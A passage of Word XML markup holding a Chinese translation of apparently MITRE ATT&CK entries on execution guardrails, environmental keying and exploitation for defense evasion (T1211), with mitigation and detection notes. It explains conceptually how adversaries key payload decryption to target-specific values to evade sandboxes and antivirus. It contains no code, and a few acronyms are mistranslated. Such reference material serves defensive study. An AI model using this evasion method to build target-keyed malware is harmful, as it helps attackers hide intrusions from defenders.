          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行护栏基于预期在目标上存在的对手提供的环境特定条件来约束执行或动作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20873DFD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>护栏确保有效负载仅针对预期目标执行，并减少对手战役造成的附带损害。攻击者可以提供的目标系统或环境作为护栏的值，可能包括特定的网络共享名称、附加的物理设备、文件、加入的活动目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>域和本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>外部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F61CA5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>环境密钥是一种类型的护栏，包括用于从给定计算环境中的特定类型的值派生加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>解密密钥的加密技术。值可以从目标特定元素派生，并用于为加密的有效负载生成解密密钥。目标特定值可以从特定网络共享、物理设备、软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>软件版本、文件、已加入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>域、系统时间和本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>外部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>地址派生。通过从目标特定的环境值生成解密密钥，环境密钥设置会使沙盒检测、防病毒检测、信息众包和逆向工程变得困难。这些困难会减慢事件响应过程，并帮助对手隐藏其战术、技术和过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>TAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659CEEC8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00933429" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>模糊文件或信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>类似，对手可能使用护栏和环境键控来帮助保护他们的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>TSP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和逃避检测。例如，环境密钥可用于向目标传递加密的有效负载，该目标将使用目标特定值在执行之前解密负载。通过使用目标特定值解密负载，攻击者可以避免将解密密钥打包到有效负载中，或者通过可能受监视的网络连接发送。根据收集目标特定值的技术，加密有效负载的反向工程可能异常困难。通常，护栏可用于防止在不希望在内部受到破坏或操作的环境中暴露</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能。护栏的这种使用不同于典型的虚拟化</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>沙箱逃避，其中可以做出不进一步参与的决定，因为对手指定的价值条件是针对特定目标的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是它们可以在任何环境中发生。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508153E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00933429" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7BEE28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="7691"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="04EB7779" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="380"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="096C1AF9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7691" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="13537CE7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="01B8FD24" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5853105B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不用缓解</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05A76421" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00933429">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>执行护栏</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>可能不应通过预防性控制来缓解，因为它可能会保护意外目标不受危害。如果目标明确，应重点防止对手工具在活动链中更早运行，并在受到攻击时识别后续恶意行为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30D3F591" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E808AF4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>根据实现的不同，检测环境键控操作可能很困难。监控正在生成的可疑进程，这些进程收集各种系统信息或执行其他形式的</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>发现，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>尤其是在短时间内，可能有助于检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F83DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00933429" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F528B3A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用漏洞进行防御逃逸</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4423AE94" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CB41706" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E32CC8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E32CC8">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:t xml:space="preserve"> T1211</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E40AB0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E32CC8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7ABCAF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E32CC8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E32CC8">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:t xml:space="preserve"> Linux, Windows, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35A548A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E32CC8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E32CC8">
              <w:lastRenderedPageBreak/>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20E05E7F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E32CC8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E32CC8">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>错误报告，进程监控，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A95FA56" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E32CC8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防病毒、系统访问</w:t>
            </w:r>
            <w:r>
              <w:t>控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46B1AB08" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E32CC8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E32CC8">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:t>: John Lambert, Microsoft Threat Intelligence Center</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28FB1A10" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B42539" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E32CC8">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32CC8">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27ED4AA5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55555E7A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A1580B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1580B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>当攻击者利用程序、服务或操作系统软件或内核本身中的编程错误来执行攻击者控制的代码时，就会发生软件漏洞的利用。防御安全软件中可能存在漏洞，可用于禁用或规避这些漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4716538C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A1580B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可能事先知道，侦察安全软件存在于环境中，或者他们可能在系统被泄露安全</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1580B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>软件发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>期间或不久后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>进行检查。安全软件可能会直接成为利用的目标。有防病毒软件被持久威胁组作为攻击目标，以避免检测的示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E900AE9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="01AD9743" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="36FF5972" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7D174B38" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00D12CC9" w14:paraId="341DED0D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B9098D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序隔离和沙盒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75435B99" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使对手难以通过使用沙盒利用未发现或未修补的漏洞来推进其操作。其他类型的虚拟化和应用程序微细分也可能减轻某些类型的开发的影响。这些系统中可能存在更多漏洞和弱点的风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00D12CC9" w14:paraId="4797D2D6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B1BD7EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞利用保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76376E85" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用于查找在利用期间使用的行为的安全应用程序，如</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> Windows </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御者漏洞利用防护</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>WDEG</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
